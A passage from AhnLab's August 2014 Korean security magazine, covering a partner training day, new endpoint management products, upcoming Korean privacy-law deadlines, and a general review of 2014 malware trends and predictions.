안랩온라인보안매거진 2014. 08 Endpoint Strategy
월간 2014. 08 CONTENTS 3 Spotlight Partner Step-up Training Day 2014 2014년하반기안랩제품의세일즈포인트는? 5 Special Report 엔드포인트보안관리솔루션신제품출시안랩, 엔드포인트보안관리의새 판 을짜다 8 Hot Issue 2014 하반기주의해야할정보보호법령들달라지는주요법령, 점검사항은? 11 Focus In-Depth 악성코드분석가가예측한하반기보안위협은? 14 Threat Analysis 전격해부! 공유기 DNS 변조공격의실체 18 Tech Report P2P Analysis 1부 _P2P 기술의그림자, 불법파일공유를막아라 22 IT & Life 느려진 PC 빠르게사용하는방법스마트폰보안수칙, 이것 만은지키자! 25 AhnLab News 안랩, 전사교육프로그램개편안랩, 2014 지배구조우수기업 우수상 수상! 26 Statistics 2014년 6월보안통계및이슈 2
SpotLight Partner Step-up Training Day 2014 Partner Step-up Training Day 2014 2014 년하반기안랩제품의세일즈포인트는? 통합보안기업안랩이지난 7월 18일, 22일양일에걸쳐안랩판교사옥대강당에서네트워크및소프트웨어파트너사영업대표를대상으로 2014 안랩파트너스텝업트레이닝데이 (AhnLab Partner Step-up Training Day 2014, 이하스텝업 ) 를개최했다. 이행사에서안랩은최근출시한신제품과기존제품의업그레이드내용, 그리고이제품들의세일즈포인트를소개했다. 또한출시예정인안랩라이선스프로그램과하반기파트너프로그램에대해파트너영업대표들과공유하는자리를가졌다. 안랩은 7 월 18 일과 22 일, 양일에걸쳐 2014 안랩파트너스텝업트레이닝데이 를가졌다. 행사첫날인 18일에는안랩네트워크제품파트너사영업대표를위한세션이마련되었다. 안랩제품기획팀유명호팀장은지난 7월초출시된트러스가드 (TrusGuard) 2.1.4 버전의주요기능들을소개하고, 차세대방화벽으로진화하고있는트러스가드의세일즈포인트에대해설명했다. 특히더욱강력해진애플리케이션콘트롤기능을비롯해경쟁사대비우위를점하고있는방화벽성능에대해집중소개했다. 두번째세션에서는지난 6월말출시된네트워크보안통합관리제품인 안랩 TSM 에대한설명이이어졌다. 안랩 TSM은 조직내다수의안랩네트워크보안장비운영정책의일괄또는개별설정 보안장비시스템을비롯해네트워크, 가상사설망 (VPN), 보안현황에대한통합모니터링환경 빅데이터환경에최적화된대용량로그저장및분석, 관리기능을제공한다. 이를통해기업보안관리자는기업의전반적인네트워크보안현황을한눈에파악하고, 고도화된사이버보안위협에신속하고정확히대응할수있다. 세번째세션에서는안랩 RMA(Return Merchandise Authorization) 프로그램의성과공유와함께하반기업-셀링 / 윈백프로그램에대해설명했다. 행사두번째날인 7월 22일에는안랩소프트웨어파트너사를위한다양한세션이마련되었다. 첫번째세션의강연자인안랩제품기획팀이건용과장은 V3 9.0, 어떻게달라지나 라는주제로 V3 IS 9.0, V3 ES 9.0, V3 Net 9.0의개선기능에대해설명했다. V3 9.0 제품군은폐쇄망이슈대응이가능하도록네트워크모듈분리설치가가능해진다. 특히고급화면을선택해야볼수있었던주요기능을메뉴바형태의메인 UI 에제공함으로써사용자들이빠르고쉽게메뉴를선택할수있도록사용성을개선했다. 두번째세션에서는 7월 30일출시한엔드포인트관리제품군에대한자세한소개가진행됐다. 해당제품은 AhnLab Policy Center 4.6, AhnLab EMS, AhnLab Patch Management, AhnLab Privacy Management Suite, AhnLab 내PC지키미, AhnLab ERS 등총 6개제품이다. 안랩제품기획팀김재만대리는 이번엔드포인트관리제품출시에있어서제품기능개선은물론이고, 제품판매구성및가격전략까지변화를주었다. 이변화에따라안랩은높은퀄리티의제품을합리적인가격에고객에게제공할수있게됐다 고강조했다. 특히파트너영업대표들은이날처음으로소개된엔드포인트통합관리플랫폼인 AhnLab EMS와웹기반의리포팅시스템인 AhnLab ERS에큰관심을보이며, 추가자료를요청하기도했다. 3
이어진세번째세션에서는출시예정인안랩라이선스프로그램 (AhnLab License Program) 이소개되었다. 안랩라이선스프로그램은일정한구매볼륨과제품에따라 SLP(Selected License Program) 과 ELP(Enterprise License Program) 로구성되어있다. SLP는 V3를구매하고자하는중소기업및중견기업에적합한프로그램이며, ELP는 V3와엔드포인트통합관리솔루션을함께구매하고자하는중견및대기업 ( 클라이언트기준 100copy 이상 ) 에적합한프로그램이다. 이두가지프로그램모두 3년라이선스비용을계약기간동안연간분할납부할수있어초기도입비용부담을줄일수있는것은물론, 전체도입비용이최대 60% 까지절감된다. 마지막세션에서는 파트너프로그램, 이것만은알고가자! 는주제로하반기에달라지는안랩의제품과더불어안랩의데모프로그램, RMA 프로그램, 엔드포인트관리제품군의신규프로모션프로그램등각종마케팅프로그램에대한설명이이어졌다. 안랩은매년 4회에걸쳐파트너영업대표를대상으로세일즈역량강화를도모하고자이행사를개최하고있다. 이번 2014 안랩파트너스텝업트레이닝데이 는지난 3월이어올해두번째로개최된행사이다. 파트너영업대표들은 2014 안랩파트너스텝업트레이닝데이 를통해안랩제품의변화와다양한파트너프로그램에대한정보를얻을수있었다. 안랩제품기획팀이건용과장 ( 左 ) 과김재만대리 ( 右 ) 가각각 V3 IS 9.0 과 APC 4.6 제품의변화에대해소개했다. 이날행사에서파트너사영업대표들은새롭게선보이는안랩라이선싱프로그램과하반기파트너프로그램에대해큰관심을나타냈다. 4
Special Report Endpoint Management APC 4.6, AhnLab EMS, AhnLab ERS 등엔드포인트관리신제품출시 안랩, 엔드포인트보안관리의새 판 을짜다 안랩은자사클라이언트 PC 및서버보안제품군을효율적으로관리할수있는엔드포인트중앙관리솔루션인 안랩폴리시센터 4.6(AhnLab Policy Center 4.6, 이하 APC 4.6) 을출시했다. 또한 APC 4.6을비롯한다수의엔드포인트보안관리솔루션을설치및운용할수있는하드웨어형태의엔드포인트통합관리플랫폼인 AhnLab EMS 와웹리포팅시스템 AhnLab ERS 도함께출시했다. 기존의엔드포인트보안관리제품군의라인업을소프트웨어형태의개별솔루션과하드웨어형태의플랫폼으로완전히개편한것이다. 이는안랩의엔드포인트통합보안전략의일환으로, 이와함께주요엔드포인트보안관리솔루션들의기능을강화하는등자사엔드포인트보안솔루션의고도화를본격화하고있다. 악성코드, OS 및애플리케이션취약점등전통적인 PC 취약점을비롯해개인정보보호법까지최근기업의엔드포인트를둘러싼위협요소가다변화됨에따라기업이도입하는엔드포인트보안솔루션의수도늘어나고있다. 그러나조직내수많은엔드포인트시스템에설치된다양한보안솔루션에대한관리부족으로백신을설치하고도악성코드에의한피해를입는등상당수기업의엔드포인트보안수준은여전히우려스럽다. 게다가다수의엔드포인트보안솔루션을설치하고운용하는시스템의안정성문제도기업보안관리자에게또다른부담이되고있다. 이에안랩은다수의엔드포인트시스템과보안솔루션을개별또는효율적으로통합관리하기위한 엔드포인트중앙관리솔루션인 APC 4.6 과 안정적인하드웨어기반의엔드포인트통합관리플랫폼 AhnLab EMS 보안정책에따라별도로연동하여사용할수있는웹리포팅시스템 AhnLab ERS를새롭게출시했다. 이를통해보안관리자의부담은최소화하고업무효율성을높이면서안정적인환경에서개별엔드포인트보안솔루션의운용효과가기대된다. 또한이들은전문패치관리솔루션인 안랩패치매니지먼트 (AhnLab Patch Management, 이하 APM), 개인정보유출방지솔루션인 안랩프라이버시매니지먼트스위트 (AhnLab Privacy Management Suite, 이하 APrM Suite), PC 취약점점검솔루션인 안랩내PC지키미 와연계해통합적인엔드포인트보안관리체계를구현, 기업의전반적인엔드포인트보안수준을향상시킨다. 강력하고스마트한엔드포인트보안관리, APC 4.6 APC 4.6은안랩의클라이언트 PC 및서버용보안솔루션 V3 제품군을중앙에서효율적으로관리할수있는엔드포인트중앙관리솔루션으로, 리눅스기반의시스템에설치및운용할수있다. APC 4.6은다양한중앙제어기능과직관적인관리자화면을제공해보안관리자의부담은최소화하고엔드포인트보안솔루션의운용효과는극대화한다. 다수의 V3 제품군을중앙에서일괄관리하고 악성코드확산방지를위한사전방역정책을설정할수있다. 또한 자산관리, 원격지원등데스크톱관리 (Desktop Management) 기능을제공해기업내전체 PC에대한효율적인제어가가능해위협발생시중앙에서신속하게조치할수있다. 이밖에도기존 APC 제품대비, 보고서정합성등동기화성능을대폭개선했으며어플라이언스형태로제공됐던기존의 APC 어플라이언스 (APC Appliance) 보다기업의환경과요구에맞게유연하게적용할수있다. 한편 APC 4.6은출시와함께 CC인증 (EAL3) 을획득했다. 5
AhnLab Policy Center 4.6 관리자화면 엔드포인트통합관리플랫폼 AhnLab EMS 모든보안시스템이그렇듯, 엔드포인트보안솔루션을운영함에있어서도 중단없는 (seamless) 안정성이기본이며가장중요하다. 이에안랩은엔드포인트보안시스템의안정성을확보하고시스템의유지 보수편의성을위해하드웨어형태의엔드포인트통합관리플랫폼인 AhnLab EMS를출시했다. 엔드포인트통합관리플랫폼 AhnLab EMS AhnLab EMS는엔드포인트관리시스템 (Endpoint Management System) 의약자로, APC 4.6, APrM Suite 등안랩의다양한엔드포인트보안솔루션을개별또는동시설치하고안정적으로운용할수있다. 안랩이제시하는엔드포인트통합보안체계의핵심이 APC 4.6이라면 AhnLab EMS는주춧돌이라할수있다. AhnLab EMS를기반으로한엔드포인트보안솔루션설치및운용의최고장점은단일에이전트다. 다수의솔루션을하나의에이전트로동시에운용할수있으며하나의통합콘솔을통해관리가가능하다. 사용자의불편은최소화하면서기존 APC 어플라이언스기반의통합관리체계의강점은그대로제공하는것이다. 안랩이기존의 APC 어플라이언스대신각개별솔루션과하드웨어형태의플랫폼인 AhnLab EMS로엔드포인트관리솔루션제품군의라인업을개편한이유는명확하다. 안정적인하드웨어플랫폼을기반으로각기업의환경과니즈에따라필요한제품을유연하게적용및사용할수있는환경을제공하는것. 플랫폼을기반으로다수의보안솔루션을통합운용하거나내PC지키미등특정솔루션은별도로운용할수도있다. 즉, 다양한고객사별요구사항을적극적으로반영한다는안랩의기조에따른것으로, 산업별 사업장별각기다른실질적인사용방식을고려한것이다. 이와함께기업의규모와환경에따라효율적으로적용할수있도록 AhnLab EMS 2000P부터 10000PR까지다양한모델을제공한다. 더강력한엔드포인트보안을위한안랩의다각화 고도화전략안랩은고객의다양한요구사항을반영하기위한노력으로 AhnLab ERS도출시했다. AhnLab ERS(Endpoint Reporting System) 는웹기반의모니터링및리포팅전용시스템으로, 다수의엔드포인트보안솔루션의운용현황에대해다양한형태의보고서를제공한다. 보안에민감한공공및일부산업분야에서는보안솔루션의설치및운용환경과이에대한모니터링환경을별도로구현해야하는경우가있다. 이러한환경에서는구체적인현황파악을위해정확한정보는물론, 효율적인모니터링이가능한직관성과접근성이요구된다. AhnLab ERS는웹기 6
반의유연한접근성과직관적인 UI, 각종통계보고서, 예약보고서등다양한기능을통해통합모니터링의효율성과관리자의편의성을극대화한다. 안랩은엔드포인트보안솔루션의라인업을개편함과동시에주요엔드포인트보안솔루션의기능을강화했다. 공공부문을중심으로꾸준히관심을받고있는 PC 취약점점검솔루션인 AhnLab 내PC지키미가대표적이다. 백신강제업데이트등취약항목자동조치기능 설문기능등사용자정의보안점검기능을추가하고 리포트기능을강화했으며 취약점점검항목을기존 16개에서 37개로확대했다. 특히타사내PC지키미제품과달리안랩은자사패치관리솔루션인 APM 연동을통한자동조치가가능하다. 또한고객의환경에따라단독서버버전도제공해개별마스터 / 콘솔 / 에이전트를이용할수있다. 이외에도개인정보유출방지솔루션인 APrM Suite는개인정보를선별해워터마크를출력할수있는기능을추가했으며, 패치관리솔루션 APM 역시연내업그레이드를진행할예정이다. AhnLab 내 PC 지키미 사용자화면 안랩제품기획실정진교실장은 APC 4.6 등안랩의다양한엔드포인트보안관리솔루션을안정적인플랫폼인 AhnLab EMS에설치및운용함으로써기업의엔드포인트보안현황을한눈에파악하고다양한위협에신속하게대응할수있다 며 기업의핵심지점인엔드포인트를더욱안전하게보호하기위해엔드포인트보안솔루션을다각화 고도화하기위해최선의노력을다할것 이라고밝혔다. 한편안랩은 APC 4.6 등신제품출시와함께자사엔드포인트보안솔루션구매고객을위한차별적인구매방식인안랩라이선스프로그램 (AhnLab License Program) 을출시한다. 이프로그램을통해기업은규모와필요에따라 V3 제품군과신제품인 APC 4.6, 그외엔드포인트보안솔루션을다양한혜택과함께보다경제적인가격으로구매할수있다. 7
Hot Issue Compliance 2014 하반기주의해야할정보보호법령들 달라지는주요법령, 점검사항은? 한국의개인정보보호법이개인정보보호에관한한세계에서가장엄격한규제중하나라는사실은익히알려져있다. 그럼에도불구하고개인정보유출사고는지난몇년간끊이지않고있으며이를막기위한법령또한창과방패의싸움처럼반복적으로강도를높여가고있다. 이미상반기가훌쩍지나버린 2014년이지만올하반기에는특히주의해야할법령개정안의적용시점들이있어정리해보고자한다. [ 모든사업자와공공기관 ] 개인정보보호법개정안 : 2014 년 8 월 7 일부터시행 2013년 8월 6일에개정된개인정보보호법개정안이올해 8월 7일부터시행된다. 기업에서챙겨봐야할중요한조항은다음과같다. 1. 개인정보수집시정보주체의동의를받는경우필요한최소한의정보외에는수집에동의하지않을수있다는사실을구체적으로알리고동의를받아야함 ( 개인정보보호법제16조2항 ) 현재대부분기업의개인정보수집이용동의절차양식에는개인정보의수집항목과수집이용목적, 보유및이용기간등과함께동의를거부할권리가있다는사실과동의거부에따른불이익에대한고지내용만기재되어있을것이다. 앞으로기업은이용자 ( 고객 ) 에게제공하려는서비스를위해반드시필요한최소한의개인정보항목이무엇인지구체적으로밝히고그외의다른개인정보에대해서는이용자가제공하지않거나수집이용에동의하지않을수있도록개인정보수집양식과동의절차를상세화할필요가있다. 2. [ 중요 ] 주민등록번호처리의제한 ( 개인정보보호법제24조의2) 8월 7일부터개인정보중주민등록번호를처리하는일은금지된다. 많은기업이 ARS 상담접수시주민등록번호입력을통해본인확인을하곤하는데이또한 8월 7일부터는허용되지않는다. 기업에게일반적으로허용되는예외는다른법에서 주민등록번호 라고구체적으로명시하여처리를요구하거나허용한경우뿐이다. 법령에는제3자의생명, 신체, 재산의이익을위해명백히필요하다고인정되는경우 ( 제24조의2 1 항2호 ) 와안전행정부령으로정한경우 ( 제24조의2 1항3호 ) 도예외이긴하지만일반기업에적용되기란거의불가능하기때문이다. 이조항에관련하여기업에서준비해야할일은모든개인정보수집이용양식에서주민등록번호수집항목을없애고내부의정보처리과정에서도주민등록번호없이운영가능하도록조치하는일이다. 서류처리과정은물론이고문서의양식, 전산시스템의데이터구조에서도법적인근거가없는주민등록번호처리를하지않도록바꿔야한다. 주민등록번호는많은정보처리시스템에서특정개인을식별하고다른사항과개인을연결하는키 (Key) 로쓰이곤한다. 이런목적의주민등록번호사용은기술적으로대체가능한다른값으로바꿔사용하고, 기존주민등록번호를계속사용해야만하는부득이한상황이라면관련행정기관을통해 입법청원 을하라고안전행정부는안내하고있다. 8
주민등록번호처리필요시입법청원안내 출처 : 안전행정부 3. 개인정보보호관련법규위반시처벌강화 ( 제34조의2, 제65조 ) 개인정보보호관련법규위반행위가있다고인정될만한상당한이유가있는경우안전행정부장관은책임있는자를징계할것을그소속기관 / 단체장에게권고할수있도록하고있는데, 개정안에서는 책임있는자 를 대표자및책임있는임원을포함한다 라고구체화하고있다. 또한주민등록번호에관련하여주민등록번호가분실 / 도난 / 유출 / 변조또는훼손된경우에 5억원이하의과징금을부과할수있도록처벌이강화되었다. 이처벌을경감시키려면개인정보의안전성확보조치 ( 제24조제3항 ) 를충분한수준으로이행하고있어야만한다. 구분내부관리계획 ( 제3조 ) 접근권한관리 ( 제4조 ) 비밀번호관리 ( 제5조 ) 접근통제시스템 ( 제6조 ) 암호화 ( 제7조 ) 접속기록보관 ( 제8조 ) 보안프로그램 ( 제9조 ) 주요내용 보호책임자지정및역할과책임, 취급자교육등 소상공인은내부관리계획수립의무면제 업무수행에필요한최소한의범위로차등부여 접근권한부여기록은최소 3년간보관 비밀번호작성규칙수립의무화 방화벽등접근통제시스템설치운영 업무용컴퓨터만을이용해개인정보처리시, 접근통제시스템설치의무면제 (O/S, 보안프로그램의접근통제기능이용 ) 암호화대상 : 고유식별정보, 비밀번호, 바이오정보 암호화기준 - ( 전송시 ) 정보통신망송수신등의경우암호화 - ( 저장시 ) 1 비밀번호및바이오정보암호화 ( 비밀번호는일방향암호화 ) 2 고유식별정보는인터넷구간, DMZ 구간저장시암호화하고내부망저장시위험도분석에따라암호화적용여부, 적용범위결정 ( 단, 주민번호는내부망저장시에도암호화해야함 ) 최소 6개월이상보관 백신소프트웨어등보안프로그램설치, 자동또는일 1회이상업데이트 물리적접근방지 ( 제10조 ) 개인정보물리적보관장소에대한출입통제절차등 [ 표 ] 개인정보의안정성확보조치 [ 정보통신서비스제공자대상 ] 정보통신망이용촉진및정보보호등에관한법률 : 2014 년 8 월 17 일까지 2012년 2월 17일일부개정된 정보통신망이용촉진및정보보호등에관한법률 ( 이하정통망법 ) 은 2012년 8월 18일시행되었고정보통신서비스제공자는법시행일로부터 2년이내에보유하고있는주민등록번호를파기하도록규정하고있다. 그 2년이종료되는시점이오는 2014년 8월 17일이다. 정보통신서비스제공자가보유한주민등록번호의파기완료정보통신서비스제공자는 2014년 8월 17일까지보유한주민등록번호를모두파기해야한다. 물론법적인예외근거가있다면파기대상에서제외할수있다. 법적예외란, 본인확인기관으로지정받았거나, 법령에서주민등록번호의수집이용을허용한경우이거나, 방통위고시에따라주민등록번호수집을허용받은경우에해당된다. 개인정보보호법과마찬가지로법적인근거가있는경우를제외하고일반기업에서다른예외를적용받기란쉽지않아보인다. 기업에서혼란스러워하는것은개인정보보호법과정통망법의파기시한이다르다는점이다. 개인정보보호법은 2016년 8월 6일이주민등록 9
번호파기완료시한이고정통망법은 2014년 8월 17일이완료시한이다. 만약어떤회사가영리적목적으로온라인서비스를하고있고그서비스를이용하는회원을보유하고있다면회원들의주민등록번호는올해 8월 17일까지파기해야하는것이다. 흔히정보통신서비스를온라인게임이나포털사이트, 인터넷쇼핑몰정도로만떠올리는데요즘대부분의금융거래나주식매매도인터넷으로가능하고휴양림예약이나지자체의특산물판매등과같이공공기관또한영리목적의인터넷서비스를제공한다는점을감안하면법적용대상이의외로많음을알수있다. 파기할데이터를저장하고있는장비는서버와같은대형정보처리시스템외에일반 PC에저장한자료도포함되며 복구재생할수없게끔 파기해야한다는조건을유념해야하겠다 ( 예를들어 PC에서 Delete키나 Shift-Delete키를눌러삭제하는정도로는안된다는뜻이다.) [ 정보통신서비스제공자대상 ] 정보통신망법개정 : 2014 년 11 월 29 일부터 2014 년 5 월 28 일정보통신망법이개정되었다. 시행시점은 6 개월뒤인 2014 년 11 월 29 일부터이다. 1. 최소한의개인정보수집제한조항구체화 ( 제23조 1,2항개정, 3항신설 ) 기존법령에도개인정보수집은서비스제공을위하여필요한최소한의정보에한정된다는조항이있었다. 다만 최소한 의범위란기준이모호하기때문에사업자잣대로만판단하는폐단이없지않았다. 개정법령에서는 최소한의개인정보 란 해당서비스의본질적기능을수행하기위해반드시필요한정보 라고명시함으로써전보다는의미가뚜렷해졌다. 2. 영업양수시양도업체의기존고객들에게개인정보의이전사실을알려야함 ( 제26조2항 ) 기존법령에는개인정보이전사실을정보주체들에게알려야할의무가양도업체에게우선적으로있었으며양도업체가이전사실을알린경우양수업체는통지의무가없었다. 개정법령은양도업체와양수업체모두개인정보이전사실을정보주체에게알리도록의무화함으로써설령양도업체가미이행한일이생기더라도양수업체를통해정보주체가이전사실을확인할수있도록하였다. 양도 양수두업체가모두개인정보이전통지를하게될경우비용의낭비가될수도있겠지만중복비용보다개인정보이전에관한정보주체의권리를더중시하겠다는정부의지를읽을수있는부분이다. 3. 정보누출사고발생시 24시간내신고의무 ( 제27조의3) 개인정보누출 ( 도난 / 분실 ) 사고발생시정보통신서비스제공자는 지체없이 이용자와방송통신위원회에누출사실을알리도록하였으나이역시 지체없이 의의미가자의적으로해석되어 최대한빠른시간내 라는본의미를충족시키기어려운문제가있었다. 이번개정안에서는 24 시간내 라는시한을구체적으로정함으로써사업자의빠른신고대응을촉구하고있다. 4. 개인정보 파기 의의미구체화및파기관련위규시 2년이하징역 2천만원이하벌금의형사처벌 ( 제29조, 제30조, 제73조 ) 이조항은이번개정안에서가장파괴력이큰부분이다. 기존에도개인정보의 파기 란복구재생할수없는상태로만드는것이라는해설이있었다. 개정안에는아예법조항에 복구재생할수없도록파기 해야한다고명시하였다. 개인정보수집이용목적이달성되었거나수집보유기간이종료된이후, 사업폐업후에도개인정보를파기하지않는경우엔 2년이하의징역또는 2천만원이하의벌금에해당하는형사처벌을할수있도록하였다. 과거에는개인정보의기술적 / 관리적보호조치기준을이행하지않더라도 3천만원이하의과태료부과가처벌의전부였다. 앞으로는파기를하지않고있는상황만으로도형사처벌을받을수있기때문에부적절한개인정보보유는기업개인정보보호책임자에게최대의위협이될수있다. 5. 법정손해배상의청구 ( 제32조의 2 신설 ) 2014년 11월 29일부터개인정보가분실 / 도난 / 누출되는사고가발생하면이용자는 300만원이하의범위에서손해배상을청구할수있다. 정보통신서비스제공자는고의또는과실로법규정을위반하지않았다는사실을입증하지않으면책임을면할수없고법원은변론취지와증거조사결과를고려해서법정손해배상금액을인정하게끔하였다. 기존법령과차이가큰점은사업자의과실과개인정보유출사고의직접적인인과관계가드러나지않고이용자가입은피해의범위를산정할근거가모호하더라도일정금액범위의법정손해배상지급을선고할수있게끔되었다는사실이다. 기업입장에서법에서정한모든기술적 / 관리적보호조치기준을 100% 충족시키기란현실적으로어려울수있기때문에개인정보유출사고가일단발생하면이용자에대한대규모의손해배상부담을피해가기어렵게된것이다. 개인정보보호법령이강화될수록국민입장에서는안심이되겠지만기업입장에서는가중되는정보보호비용부담에신음소리가높아지는듯하다. 하지만한편으로이런상황까지이르게한근본원인은개인정보를국민의안전관점에서보지않고관리의편의성이나영업대상으로만취급하여방만하게보유하고이용해온관행의적폐일수도있다. 이제라도쇄신하여꼭필요한목적, 꼭필요한양이외의개인정보는완전파기하고최소한의정보만을안전하게보관하는선도적인보안문화가정착되기를기대해본다. 10
Focus In-Depth Review & Predict 2014 년상반기보안동향및하반기예측 악성코드분석가가예측한하반기보안위협은? 2014 년상반기는개인정보유출, 윈도 XP 서비스지원종료, 스피어피싱, 스미싱등의보안위협이이슈가되었다. 이에따라월간 안 7 월호에서는 2014 년상반기이슈를대표할만한사건과용어를살펴본바있다. 이번호에서는 ASEC( 안랩시큐리티대응센터 ) 에 서발표한 2014 년상반기보안동향과하반기보안위협예측을소개한다. 2014년상반기보안동향하이브리드악성코드악성코드제작자는더이상플랫폼을구분하지않는다. 이제까지 PC 악성코드제작자는 PC만을대상으로악성코드를제작하고, 모바일악성코드제작자는모바일플랫폼을대상으로악성코드를제작했다. 그러나 2014년상반기에발견된악성코드중일부는 PC를먼저감염시킨후모바일단말기에악성코드를감염시키는기능을포함하고있다. 이악성코드는감염된 PC로모바일단말기가연결되는것을감지해악성앱을설치한다. 또공유기의취약점을공격해공유기에설정된 DNS 정보를변조하는기법도확인되었다. 과거에는 PC의호스트 (hosts) 파일을변조해유명사이트접근시피싱사이트로연결을유도했다. 반면최근에는공유기의취약점을이용해 DNS 설정을변경하는방법으로변조된공유기에연결된 PC와모바일단말기모두에영향을미치는방법도활용하고있다. POS 시스템보안문제 2013년말미국유명유통사의 POS(Point-of-Sales) 시스템이해킹당해 7,000만명이상의개인정보가유출되었다. 이사건이후미국백화점, 식당등의 POS 시스템해킹으로신용카드정보유출이꾸준히발생하고있다. 국내에서도 POS 단말기를해킹해유출한정보로 149장의위조카드를만든일당이검거되었다. 이들은 POS 시스템공급업체의서버를해킹해정상파일을악성코드로교체하는방식을이용했다. IoT 보안문제시작사물인터넷 (IoT) 의보안문제가발생하기시작했다. 보통리눅스로운영되는인터넷공유기를감염시키는웜이등장한것. 가상화폐인비트코인이유행하면서일부악성코드는비트코인채굴기능도포함하고있다. 국내에서도무선인터넷공유기의 DNS 주소를변경해악성코드배포에이용했고 DDoS 공격에냉난방관리용셋톱박스가이용된사례가발생하기도했다. 아직대부분의사물인터넷에는보안기능이존재하지않아근본적인해결이어려운상태이다. 11
심각한서버보안취약점연이어등장지난상반기에는심각한서버보안취약점들이다수보고되었다. 첫번째로알려진 하트블리드 (HeartBleed) 취약점은한글로표현하면 심장출혈 이라는의미를가진다. 그이름만큼이나강한인상을남겼던해당취약점 (CVE-2014-0160) 은 SSL/TLS를구현한 OpenSSL 라이브러리상의문제로메모리상에올려진민감한데이터가노출될수있다. 상반기가채지나기도전에, 6건이나되는 OpenSSL 라이브러리취약점들이추가적으로발표되었다. 웹, 이메일, 메신저및 VPN(Vritual Private Network) 과같은광범위한애플리케이션에보안적용을위해사용한라이브러리가오히려사용자및보안관계자들의심장을바짝긴장하게했던사건이다. 두번째취약점은아파치 (Apache) 웹서버를공격할수있는아파치스트러츠 (Apache Struts) 보안우회취약점 (CVE-2014-0094) 이다. 자바 EE(Java EE) 웹애플리케이션개발을위해설치되는스트러츠 (Struts) 프레임워크상의문제로, 정상적인서비스운영을방해하고공격자가원하는코드를수행할수있는위험이존재한다. 해당프레임워크상의취약점또한이미여러차례발표된바있다. 이처럼상반기에는클라이언트시스템을주로공격하는현재트렌드속에서주목할만한서버공격취약점이발생했으며, 보안을위해적용한방어막도잘못사용할경우더큰위협이될수있다는점을상기시켰다. 스미싱악성앱의고도화스미싱악성앱은 SMS( 단문문자서비스 ) 에포함된 URL 형태로유포된다. 초기에는 SMS에포함된 URL에접속할경우앱이다운로드되는단순한형태에서, 접속한클라이언트가모바일단말기일경우만악성앱을다운로드받을수있도록진화했다. 특히정교한피싱사이트를제작해사용자를속이는방법도확인되었으며, 캡챠코드 (CAPTCHA) 를도입한경우도확인되었다. 배포방법과기능적인면에서도많은변화가있다. 초기스미싱악성코드는 C&C 서버의주소 (URL 또는 IP) 가내부에하드코딩되어있었으며 HTTP를통해서만명령을전달받은반면최근확인된스미싱악성코드는 SNS의댓글, SMS, XMPP( 인스턴트메신저 (IM) 를위한국제표준규격 ) 등다양한방법으로 C&C 서버로부터명령을전달받는것으로진화하고있다. 스미싱악성코드, 소액결제에서스마트폰뱅킹으로공격집중 2014년이전까지발견된국내스미싱악성코드는휴대전화인증방식을이용하는소액결제또는스마트폰뱅킹을공격대상으로삼는두가지형태로발견되었다. 그러나 2014년초부터최근까지, 소액결제를노리는악성코드는더이상발견되지않고있다. 소액결제에이용되는휴대전화인증절차가강화됨에따라악성코드제작자들이스마트폰뱅킹으로공격대상을집중한것으로보여진다. 최근발견되는인터넷뱅킹정보탈취악성앱은가짜은행앱을다운로드하는다운로더와다운로드되는가짜은행앱들로구성된다. 설치되는가짜은행앱은아이콘과화면구성까지실제은행앱과매우흡사하며사용자가입력한계좌번호, 계좌비밀번호, 보안카드등금융거래에필요한정보와기기에저장된공인인증서를탈취한다. 특정대상을감시하는스파이앱증가 2014년상반기에는과거 2~3년전과유사하게불특정다수를대상으로개인정보를유출하는스미싱악성코드가꾸준히증가했는데주로 택배, 차량단속적발, 등기, 예비군훈련등의내용으로위장해전파됐다. 그러나최근엔특정대상의통화내용, 문자, 사진, 인터넷검색기록, GPS 정보등을실시간으로엿볼수있는 스파이앱 이급격하게증가하고있다. 이스파이앱은상용앱으로제작사홈페이지에접속하면설치방법과자세한기능들을확인할수있다. 앱의이용을위해한달이용료 3만원 ~ 10만원을결제하면구매자이메일을통해다운로드받을수있다. 앱의유포는특정피해자의스마트폰에직접설치하거나문자, 메일, 메시지등으로링크를보내설치를유도하는방법이사용되고있다. 스파이앱은자녀들의비행이나배우자의외도를감시하는것이상대적으로쉬운만큼앞으로도지속적으로증가할것으로예상된다. 2014년하반기보안예측스미싱의증가및고도화인터넷뱅킹을통한금융거래나결제를위해필요한개인정보및금융정보를탈취하는스미싱기법이보다더교묘해질것이다. 일반사용자들이의심없이악성앱을설치하도록사회공학적기법을이용한문구를사용하거나정상서비스와구분이어려울만큼정교한형태의피싱사이트를구성할가능성이높다. 보안제품의진단을회피하기위한다양한시도역시지속될것이다. 또한거듭되는개인정보유출및이미악성앱에감염된사용자의단말기에저장된전화번호부가상당수유출되어이를활용한스미싱또한더욱증가할것으로예상된다. 하이브리드악성코드증가스마트폰사용자는충전이나데이터교환등을위하여 PC와자주연결하게되는데이를악용하여중요한데이터를유출하거나추가로악성코드를설치하는등의하이브리드악성코드및악성앱이증가할것으로보인다. 특히스마트폰에는개인정보, 금융거래에필요한각종정보, 기업정보, 사생활정보등금전적으로이용가치가높은데이터가많이저장되어있어 PC 감염을통해이에연결되는스마트폰까지함께감염시켜좀더효과적으로중요정보를유출하려는시도가증가할것으로예상된다. 모바일랜섬웨어의위협모바일랜섬웨어는감염된스마트폰의 SD카드에있는모든데이터를암호화시킨다. 매우높은수준의암호화알고리즘을사용하기때문에사실상악성앱제작자의복호화키말고는해제시킬방법이없다. 모바일랜섬웨어에감염되면사진, 동영상, 음악, 영화, 문서, 앱데이터파일들이모두암호화되어쓸수없게된다. 악성앱제작자는이런파일들을인질로삼은후사용자에게돈을요구한다. 최초로발견된모바일랜섬웨어는우크라이나사용자를노리고제작되었다. 우리나라처럼스마트폰과모바일뱅킹이발달한환경에서모바일랜섬웨어는더치명적으로작용할수있다. 랜섬웨어에감염된상태에서섣불리모바일뱅킹을이용하여돈을이체하려다가오히려뱅킹계정마저탈취당해더큰피해를입을수있기때문이다. 앞으로우리나라모바일사용자를목표로한모바일랜섬웨어와뱅킹계정탈취악성앱이결합된형태의새로운위협이발생할것으로예상된다. 악성코드에의한전자금융사기수법의다양화공격자가사용자의금융정보를탈취하는최종목적은사용자의예금갈취이다. 이를위해악성코드제작자는지금까지피싱, 메모리해킹, 12
